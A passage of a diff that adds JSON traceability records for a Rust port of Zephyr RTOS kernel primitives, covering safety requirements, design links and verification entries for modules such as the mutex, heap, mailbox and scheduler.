+        {
+          "target": "ZEP-SRS-DY-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "dynamic",
+        "alloc",
+        "asil-d"
+      ],
+      "title": "DY2: alloc when active < max_threads increments by 1",
+      "type": "sw-req"
+    },
+    {
+      "description": "Submitting an idle work item sets the QUEUED flag and returns 1 (newly queued).\n",
+      "id": "SWREQ-WK-WK02",
+      "links": [
+        {
+          "target": "SYSREQ-WK-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-WK-1",
+          "type": "satisfies"
+        },
+        {
+          "target": "ZEP-SRS-WK-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "work",
+        "submit",
+        "asil-d"
+      ],
+      "title": "WK2: submit from IDLE sets QUEUED flag",
+      "type": "sw-req"
+    },
+    {
+      "description": "The Zephyr RTOS condition variable broadcast shall wake all waiting threads currently in the wait queue.\n",
+      "id": "ZEP-SRS-CV-2",
+      "links": [
+        {
+          "target": "ZEP-SYRS-CV",
+          "type": "derives-from"
+        },
+        {
+          "target": "SWREQ-CV-C04",
+          "type": "satisfied-by"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "condvar"
+      ],
+      "title": "Zephyr: Condvar Broadcast Wakes All",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Verus specifications in src/kheap.rs with requires/ensures clauses that formally verify kernel heap properties (KH01-KH06) via SMT solving. Proves alloc/free state transitions, calloc overflow rejection, and invariant preservation. Executed via: bazel test //:verus_test\n",
+      "id": "FV-KH-001",
+      "links": [
+        {
+          "target": "SWREQ-KH-KH01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-KH-KH02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-KH-KH03",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-KH-KH04",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-KH-KH05",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-KH-KH06",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6"
+      ],
+      "title": "Kernel heap Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "When unlock is called by the owner and lock_count == 1 with waiters present, ownership is transferred to the highest-priority waiting thread.  lock_count stays at 1, the waiter is woken with return value 0 (OK). Maps to z_impl_k_mutex_unlock lines 278-296 in kernel/mutex.c.\n",
+      "id": "SWREQ-MUT-M08",
+      "links": [
+        {
+          "target": "SYSREQ-MUT-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-MUT-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mutex",
+        "unlock",
+        "transfer",
+        "asil-d"
+      ],
+      "title": "M8: unlock with waiters transfers ownership to highest-priority",
+      "type": "sw-req"
+    },
+    {
+      "description": "Unit tests in plain/src/msgq.rs covering init validation, put/get FIFO ordering, put_front, peek_at, purge, ring buffer wrap-around, full/empty boundary conditions, and ring consistency invariants.\n",
+      "id": "UV-MQ-001",
+      "links": [
+        {
+          "target": "SWDD-MQ-INIT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-MQ-PUT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-MQ-PUT-FRONT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-MQ-GET",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-MQ-PEEK",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-MQ-PURGE",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "unit",
+        "swe-4"
+      ],
+      "title": "MsgQ unit tests (cargo test --lib)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "Unit tests in src/atomic.rs covering new, get, set, add, sub, or, and, xor, nand, cas (match/mismatch), test_and_set, clear, inc, dec, wrapping arithmetic, and idempotence properties.\n",
+      "id": "UV-AT-001",
+      "links": [
+        {
+          "target": "SWDD-AT-CAS",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "unit",
+        "swe-4"
+      ],
+      "title": "Atomic unit tests (cargo test --lib)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "The total number of blocks is always strictly positive. Enforced by init rejecting num_blocks == 0 with -EINVAL.\n",
+      "id": "SWREQ-MS-MS02",
+      "links": [
+        {
+          "target": "SYSREQ-MS-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-MS-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mem-slab",
+        "invariant",
+        "asil-d"
+      ],
+      "title": "MS2: num_blocks > 0 (always after init)",
+      "type": "sw-req"
+    },
+    {
+      "description": "A mailbox that matches the Zephyr k_mbox API semantics: initialization, put (send message), get (receive message), with sender/receiver thread matching and data exchange.  Must validate message parameters and never exhibit undefined behavior or arithmetic overflow.\n",
+      "id": "SYSREQ-MB-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SYRS-MB",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mbox",
+        "kernel"
+      ],
+      "title": "Mailbox with put/get and message matching",
+      "type": "system-req"
+    },
+    {
+      "description": "The actual data exchanged is the minimum of the transmit and receive buffer sizes. Neither buffer is overflowed. Maps to mailbox.c:155-207.\n",
+      "id": "SWREQ-MB-MB04",
+      "links": [
+        {
+          "target": "SYSREQ-MB-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-MB-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mbox",
+        "data-exchange",
+        "asil-d"
+      ],
+      "title": "MB4: data exchange respects min(tx_size, rx_size)",
+      "type": "sw-req"
+    },
+    {
+      "description": "k_thread_abort_cleanup releases thread resources and marks the thread struct for potential reuse. Handles the case where cleanup is deferred due to scheduling constraints. Maps to thread.c:1290-1330.\n",
+      "id": "SWREQ-TL-TH05",
+      "links": [
+        {
+          "target": "SYSREQ-TL-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-TL-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "thread",
+        "abort",
+        "cleanup",
+        "asil-d"
+      ],
+      "title": "TH5: abort cleanup handles resource release and reuse",
+      "type": "sw-req"
+    },
+    {
+      "description": "A put followed by a get returns count to its original value.\n",
+      "id": "SWREQ-LI-LI05",
+      "links": [
+        {
+          "target": "SYSREQ-LI-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "lifo",
+        "roundtrip",
+        "asil-d"
+      ],
+      "title": "LI5: put-get roundtrip preserves state",
+      "type": "sw-req"
+    },
+    {
+      "description": "When the pool is full, alloc returns ENOMEM without modifying state.\n",
+      "id": "SWREQ-DY-DY03",
+      "links": [
+        {
+          "target": "SYSREQ-DY-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-DY-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "dynamic",
+        "alloc",
+        "asil-d"
+      ],
+      "title": "DY3: alloc when full returns ENOMEM",
+      "type": "sw-req"
+    },
+    {
+      "description": "When push is called and count >= capacity, returns ENOMEM without modifying the stack state. Maps to stack.c:101-136.\n",
+      "id": "SWREQ-SK-SK04",
+      "links": [
+        {
+          "target": "SYSREQ-SK-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-SK-3",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "stack",
+        "push",
+        "error",
+        "asil-d"
+      ],
+      "title": "SK4: push when full returns ENOMEM, state unchanged",
+      "type": "sw-req"
+    },
+    {
+      "description": "Every state transition in the kernel synchronization primitives (semaphore, mutex, condvar, scheduler run queue) produces the correct post-state as specified in the SWREQ-* requirements and validated by differential testing against POSIX and FreeRTOS reference implementations.  Addresses SC-1, SC-2, SC-3.\n",
+      "id": "G-3",
+      "links": [
+        {
+          "target": "G-1",
+          "type": "sub-goal-of"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "safety",
+        "asil-d",
+        "state-machine",
+        "differential-testing"
+      ],
+      "title": "All kernel state transitions are correct",
+      "type": "safety-goal"
+    },
+    {
+      "description": "Thread stack geometry validator with validate/usable_size/top/ usable_start/is_valid_sp/is_in_guard. Validates alignment, guard region, and overflow constraints. No unsafe code.\n",
+      "id": "SWARCH-SKS-001",
+      "links": [
+        {
+          "target": "SWREQ-SKS-SK01",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-SKS-SK03",
+          "type": "allocated-from"
+        },
+        {
+          "target": "PROV-SKS-001",
+          "type": "replaces"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "stack-config",
+        "architecture"
+      ],
+      "title": "Stack config module (gale::stack_config)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "Clippy with ASIL-D lint profile applied to all poll code. Same deny set as project-wide Cargo.toml [lints.clippy].\n",
+      "id": "FV-PL-003",
+      "links": [
+        {
+          "target": "SWREQ-PL-PL01",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "static-analysis",
+        "clippy",
+        "safety",
+        "swe-6"
+      ],
+      "title": "Poll Clippy safety-critical lint profile",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Clippy with ASIL-D lint profile applied to all mem_domain code. Same deny set as project-wide Cargo.toml [lints.clippy].\n",
+      "id": "FV-MD-003",
+      "links": [
+        {
+          "target": "SWREQ-MD-MD01",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "static-analysis",
+        "clippy",
+        "safety",
+        "swe-6"
+      ],
+      "title": "MemDomain Clippy safety-critical lint profile",
+      "type": "sw-verification"
+    },
+    {
+      "description": "The Zephyr RTOS mailbox shall support sender/receiver matching, allowing a thread to send to a specific thread or to any thread, and allowing a receiver to accept from a specific thread or from any thread.\n",
+      "id": "ZEP-SRS-MB-2",
+      "links": [
+        {
+          "target": "ZEP-SYRS-MB",
+          "type": "derives-from"
+        },
+        {
+          "target": "SWREQ-MB-MB03",
+          "type": "satisfied-by"
+        },
+        {
+          "target": "SWREQ-MB-MB04",
+          "type": "satisfied-by"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "mbox"
+      ],
+      "title": "Zephyr: Mailbox Sender/Receiver Matching",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Return per-thread slice_ticks if non-zero, else global slice_ticks. C source: kernel/timeslicing.c lines 25-37.\n",
+      "id": "SWDD-TS-SLICE-TIME",
+      "links": [
+        {
+          "target": "SWARCH-TS-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-TS-TS01",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-TS-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timeslice",
+        "config"
+      ],
+      "title": "Timeslice::slice_time — slice_time port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "All size arithmetic (alloc, aligned_alloc, realloc, bytes_to_chunks) is overflow-safe via u64 intermediates or bounds checks.\n",
+      "id": "SWREQ-HP-HP07",
+      "links": [
+        {
+          "target": "SYSREQ-HP-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "heap",
+        "safety",
+        "overflow",
+        "asil-d"
+      ],
+      "title": "HP7: no overflow in size calculations",
+      "type": "sw-req"
+    },
+    {
+      "description": "The sum of used and free blocks always equals the total number of blocks.\n",
+      "id": "SWREQ-MS-MS07",
+      "links": [
+        {
+          "target": "SYSREQ-MS-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mem-slab",
+        "conservation",
+        "asil-d"
+      ],
+      "title": "MS7: conservation (num_used + num_free == num_blocks)",
+      "type": "sw-req"
+    },
+    {
+      "description": "No arithmetic operation on message sizes or internal counters causes integer overflow. All arithmetic is guarded by bounds checks.\n",
+      "id": "SWREQ-MB-MB06",
+      "links": [
+        {
+          "target": "SYSREQ-MB-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mbox",
+        "safety",
+        "overflow",
+        "asil-d"
+      ],
+      "title": "MB6: no arithmetic overflow in any operation",
+      "type": "sw-req"
+    },
+    {
+      "description": "All index arithmetic uses u64 intermediates or bounds checks to prevent overflow.\n",
+      "id": "SWREQ-RB-RB08",
+      "links": [
+        {
+          "target": "SYSREQ-RB-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "ring-buf",
+        "safety",
+        "overflow",
+        "asil-d"
+      ],
+      "title": "RB8: no overflow in modular arithmetic",
+      "type": "sw-req"
+    },
+    {
+      "description": "When blocks are allocated, free decrements the allocated count.\n",
+      "id": "SWREQ-MP-MP04",
+      "links": [
+        {
+          "target": "SYSREQ-MP-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-MP-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mempool",
+        "free",
+        "asil-d"
+      ],
+      "title": "MP4: free when allocated > 0 decrements by 1",
+      "type": "sw-req"
+    },
+    {
+      "description": "The primary C implementation of Zephyr's priority-based scheduler. Contains runq_add, runq_remove, runq_best, next_up, ready_thread, z_ready_thread, z_impl_k_thread_suspend, z_impl_k_thread_resume, move_current_to_end_of_prio_q, update_cache, plus wait queue and thread state management. The Gale port models the priority queue, preemption decisions, and thread state machine only.\n",
+      "id": "PROV-SC-001",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "upstream",
+        "sched",
+        "kernel"
+      ],
+      "title": "Zephyr kernel/sched.c — priority scheduler implementation",
+      "type": "source-provenance"
+    },
+    {
+      "description": "Clippy with ASIL-D lint profile applied to all mailbox code. Same deny set as project-wide Cargo.toml [lints.clippy].\n",
+      "id": "FV-MB-003",
+      "links": [
+        {
+          "target": "SWREQ-MB-MB01",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "static-analysis",
+        "clippy",
+        "safety",
+        "swe-6"
+      ],
+      "title": "Mailbox Clippy safety-critical lint profile",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Release thread resources, mark for reuse. Handle deferred cleanup if scheduling constraints prevent immediate release. C source: kernel/thread.c lines 1290-1330.\n",
+      "id": "SWDD-TL-ABORT",
+      "links": [
+        {
+          "target": "SWARCH-TL-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-TL-TH05",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-TL-TH06",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-TL-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "thread",
+        "abort",
+        "cleanup"
+      ],
+      "title": "ThreadLifecycle::abort_cleanup — k_thread_abort_cleanup port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Verus specifications in src/stack.rs with requires/ensures clauses that formally verify all stack properties (SK01-SK09) via SMT solving. Proves bounds safety and invariant preservation. Includes proof lemmas for invariant induction, push-pop roundtrip, capacity conservation, full-rejects-push, empty-rejects-pop, and pop-push roundtrip. Executed via: bazel test //:verus_test\n",
+      "id": "FV-SK-001",
+      "links": [
+        {
+          "target": "SWREQ-SK-SK01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SK-SK02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SK-SK03",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SK-SK04",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SK-SK05",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SK-SK06",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SK-SK07",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SK-SK08",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SK-SK09",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6"
+      ],
+      "title": "Stack Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Integration tests in tests/kheap_integration.rs exercising the full kernel heap API surface across module boundaries. Tests init/alloc/free sequences, blocking alloc with timeout, calloc overflow edge cases, free-triggered wake-all, and aligned_alloc power-of-two validation.\n",
+      "id": "IV-KH-001",
+      "links": [
+        {
+          "target": "SWARCH-KH-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "integration",
+        "swe-5"
+      ],
+      "title": "Kernel heap integration tests",
+      "type": "sw-integration-verification"
+    },
+    {
+      "description": "Clippy with ASIL-D lint profile applied to all kernel heap code. Same deny set as project-wide Cargo.toml [lints.clippy].\n",
+      "id": "FV-KH-003",
+      "links": [
+        {
+          "target": "SWREQ-KH-KH01",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "static-analysis",
+        "clippy",
+        "safety",
+        "swe-6"
+      ],
+      "title": "Kernel heap Clippy safety-critical lint profile",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Full Zephyr kernel futex test suite executed on qemu_cortex_m3 with CONFIG_GALE_KERNEL_FUTEX=y. Tests exercise the complete k_futex_wait/k_futex_wake API through the Gale FFI/C shim layer, validating functional equivalence with upstream Zephyr. Test suite: zephyr/tests/kernel/futex.\n",
+      "id": "SV-FX-001",
+      "links": [
+        {
+          "target": "SYSREQ-FX-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "zephyr",
+        "qemu",
+        "sys-5"
+      ],
+      "title": "Futex Zephyr system integration",
+      "type": "sys-verification"
+    },
+    {
+      "description": "Garbage collection writes a GC-done marker as its final step. If power is lost before the marker is written, the recovery procedure detects the incomplete GC (source sector still CLOSED, destination sector partially filled, no GC-done marker) and either completes or rolls back the GC.  In either case, no live data is lost.\n",
+      "id": "SWREQ-ZMS-P08",
+      "links": [
+        {
+          "target": "SYSREQ-ZMS-003",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zms",
+        "power-loss",
+        "gc",
+        "recovery",
+        "asil-d"
+      ],
+      "title": "P8: Power-loss during GC recoverable via GC-done marker",
+      "type": "sw-req"
+    },
+    {
+      "description": "Zephyr fatal error handling and debug output tests executed on qemu_cortex_m3. Validates crash classification, recovery decisions, and debug output correctness with Gale integration. Test suite: zephyr/tests/kernel/fatal.\n",
+      "id": "SV-FD-001",
+      "links": [
+        {
+          "target": "SYSREQ-FD-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "zephyr",
+        "qemu",
+        "sys-5"
+      ],
+      "title": "Fatal/Debug Zephyr system integration",
+      "type": "sys-verification"
+    },
+    {
+      "description": "Increment status by 1 using checked arithmetic.\n",
+      "id": "SWDD-TM-EXPIRE",
+      "links": [
+        {
+          "target": "SWARCH-TM-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-TM-TM05",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-TM-TM08",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-TM-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timer",
+        "expire"
+      ],
+      "title": "Timer::expire — z_timer_expiration_handler port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Property-based tests in tests/proptest_msgq.rs exercising init parameter validation, fill-drain invariant preservation, ring consistency under arbitrary operations, error code correctness, peek_at slot validity, and purge return count.\n",
+      "id": "UV-MQ-002",
+      "links": [
+        {
+          "target": "SWDD-MQ-INIT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-MQ-PUT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-MQ-GET",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-MQ-PEEK",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-MQ-PURGE",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "proptest",
+        "swe-4"
+      ],
+      "title": "MsgQ property-based tests (proptest)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "Integration tests exercising fault classification across all reason/context/mode combinations.\n",
+      "id": "IV-FT-001",
+      "links": [
+        {
+          "target": "SWARCH-FT-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "integration",
+        "swe-5"
+      ],
+      "title": "Fatal integration tests",
+      "type": "sw-integration-verification"
+    },
+    {
+      "description": "A thread appears in the run queue at most once. Adding an already-queued thread is a no-op.\n",
+      "id": "SWREQ-SC-SC11",
+      "links": [
+        {
+          "target": "SYSREQ-SC-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sched",
+        "invariant",
+        "asil-d"
+      ],
+      "title": "SC11: run queue never contains duplicate threads",
+      "type": "sw-req"
+    },
+    {
+      "description": "The primary C implementation of Zephyr's mutex.  Contains z_impl_k_mutex_init, z_impl_k_mutex_lock, z_impl_k_mutex_unlock, plus priority ceiling support and userspace wrappers.\n",
+      "id": "PROV-MUT-001",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "upstream",
+        "mutex",
+        "kernel"
+      ],
+      "title": "Zephyr kernel/mutex.c — recursive mutex implementation",
+      "type": "source-provenance"
+    },
+    {
+      "description": "Each sector header contains a monotonically increasing cycle counter.  The cycle counter uniquely identifies the sector's generation (number of erase cycles).  After erase and re-open, the new cycle counter is strictly greater than the previous value. The cycle counter is used during recovery to determine the most recent sector when multiple sectors are OPEN (crash during GC).\n",
+      "id": "SWREQ-ZMS-P06",
+      "links": [
+        {
+          "target": "SYSREQ-ZMS-003",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zms",
+        "cycle-counter",
+        "generation",
+        "asil-d"
+      ],
+      "title": "P6: Cycle counter correctly identifies sector generation",
+      "type": "sw-req"
+    },
+    {
+      "description": "Submitting a work item that is already queued returns 0 and state is unchanged.\n",
+      "id": "SWREQ-WK-WK04",
+      "links": [
+        {
+          "target": "SYSREQ-WK-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "work",
+        "submit",
+        "asil-d"
+      ],
+      "title": "WK4: submit while already QUEUED is idempotent",
+      "type": "sw-req"
+    },
+    {
+      "description": "The Zephyr RTOS condition variable wait shall atomically release the associated mutex and block the calling thread on the condition variable's wait queue.\n",
+      "id": "ZEP-SRS-CV-3",
+      "links": [
+        {
+          "target": "ZEP-SYRS-CV",
+          "type": "derives-from"
+        },
+        {
+          "target": "SWREQ-CV-C06",
+          "type": "satisfied-by"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "condvar"
+      ],
+      "title": "Zephyr: Condvar Wait Atomically Releases Mutex And Blocks",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "The system shall implement a futex synchronization primitive with wait and wake operations for efficient userspace-to-kernel thread synchronization.\n",
+      "id": "ZEP-SYRS-FX",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "futex"
+      ],
+      "title": "Zephyr: Fast Userspace Mutex (Futex)",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Integration tests in tests/mbox_integration.rs exercising the full mailbox API surface across module boundaries. Tests init, validate_send acceptance and rejection, match_check with wildcard and exact thread IDs, data_exchange_size clamping, and no-match state preservation.\n",
+      "id": "IV-MB-001",
+      "links": [
+        {
+          "target": "SWARCH-MB-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "integration",
+        "swe-5"
+      ],
+      "title": "Mailbox integration tests",
+      "type": "sw-integration-verification"
+    },
+    {
+      "description": "The system shall implement a timer primitive supporting periodic and one-shot expiration with callback notification.\n",
+      "id": "ZEP-SYRS-TM",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "timer"
+      ],
+      "title": "Zephyr: Kernel Timer",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Unit tests in tools/verus-strip/src/lib.rs verifying Verus annotation stripping: spec fn removal, proof fn removal, requires/ensures clause stripping, named return type conversion, loop invariant handling, doc comment cleanup, and full-file stripping with prettyplease formatting. Convergence check validates stripped src/ compiles and passes all tests. Executed via: bazel test //tools/verus-strip:verus_strip_test\n",
+      "id": "FV-TRACTOR-001",
+      "links": [
+        {
+          "target": "REQ-TRACTOR-002",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "verus-strip",
+        "tractor",
+        "swe-6"
+      ],
+      "title": "verus-strip unit and convergence tests",
+      "type": "sw-verification"
+    },
+    {
+      "description": "When the active sector has sufficient free space for the requested write (ATE header + data payload), the write operation shall complete with a bounded number of flash operations (O(1) flash writes) and shall not trigger garbage collection.  This guarantees deterministic latency for the common-case write path.\n",
+      "id": "SYSREQ-ZMS-001",
+      "links": [
+        {
+          "target": "STKH-ZMS-002",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "storage",
+        "latency",
+        "deterministic",
+        "zms"
+      ],
+      "title": "Write latency bounded — write never triggers GC when sufficient space",
+      "type": "system-req"
+    },
+    {
+      "description": "The read index is always strictly less than max_msgs, ensuring valid ring buffer access. Maps to msg_q.c:43-470.\n",
+      "id": "SWREQ-MQ-MQ02",
+      "links": [
+        {
+          "target": "SYSREQ-MQ-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-MQ-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "msgq",
+        "invariant",
+        "asil-d"
+      ],
+      "title": "MQ2: read_idx < max_msgs (index bounds)",
+      "type": "sw-req"
+    },
+    {
+      "description": "Kani bounded model checking harnesses in tests/kani_harnesses.rs. Exhaustive exploration of pipe init, write/read invariant preservation, error codes, full-rejects-write, empty-rejects-read, and conservation within bounded state space.\n",
+      "id": "UV-PP-003",
+      "links": [
+        {
+          "target": "SWDD-PP-INIT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-PP-WRITE",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-PP-READ",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-PP-CLOSE",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-PP-RESET",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "kani",
+        "model-checking",
+        "swe-4"
+      ],
+      "title": "Pipe Kani bounded model checking",
+      "type": "unit-verification"
+    },
+    {
+      "description": "Clippy with ASIL-D lint profile applied to all spinlock code. Same deny set as project-wide Cargo.toml [lints.clippy].\n",
+      "id": "FV-SL-003",
+      "links": [
+        {
+          "target": "SWREQ-SL-SL01",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "static-analysis",
+        "clippy",
+        "safety",
+        "swe-6"
+      ],
+      "title": "Spinlock Clippy safety-critical lint profile",
+      "type": "sw-verification"
+    },
+    {
+      "description": "The Rust implementations of Gale kernel primitives are semantically equivalent to the Zephyr C originals under the full Zephyr twister integration test suite.  Equivalence is additionally confirmed by Kani C↔Rust semantic equivalence checks (FV-TRACTOR-EQ) and differential specification tests (FV-TRACTOR-DIFF).\n",
+      "id": "G-5",
+      "links": [
+        {
+          "target": "G-1",
+          "type": "sub-goal-of"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "safety",
+        "asil-d",
+        "translation",
+        "zephyr",
+        "integration"
+      ],
+      "title": "C-to-Rust translation preserves Zephyr kernel semantics",
+      "type": "safety-goal"
+    },
+    {
+      "description": "1. Type check (EBADF if mismatch, unless Any). 2. Permission check (EPERM if no access). 3. Initialization check (EINVAL/EADDRINUSE based on mode). C source: kernel/userspace.c lines 754-785.\n",
+      "id": "SWDD-US-VALIDATE",
+      "links": [
+        {
+          "target": "SWARCH-US-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-US-US01",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-US-US04",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-US-US05",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-US-US07",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-US-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "userspace",
+        "validate"
+      ],
+      "title": "KernelObject::validate — k_object_validate port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Atomic sub returns the previous value and stores the difference using wrapping u32 arithmetic.\n",
+      "id": "SWREQ-AT-AT02",
+      "links": [
+        {
+          "target": "SYSREQ-AT-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "atomic",
+        "sub",
+        "asil-d"
+      ],
+      "title": "AT2: sub returns old value, stores old - val (wrapping)",
+      "type": "sw-req"
+    },
+    {
+      "description": "Zephyr stack sentinel and overflow detection tests executed on qemu_cortex_m3 with CONFIG_STACK_SENTINEL=y. Validates that stack overflow is detected and fatal error handlers invoked correctly. Test suite: zephyr/tests/kernel/fatal.\n",
+      "id": "SV-SKS-001",
+      "links": [
+        {
+          "target": "SYSREQ-SKS-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
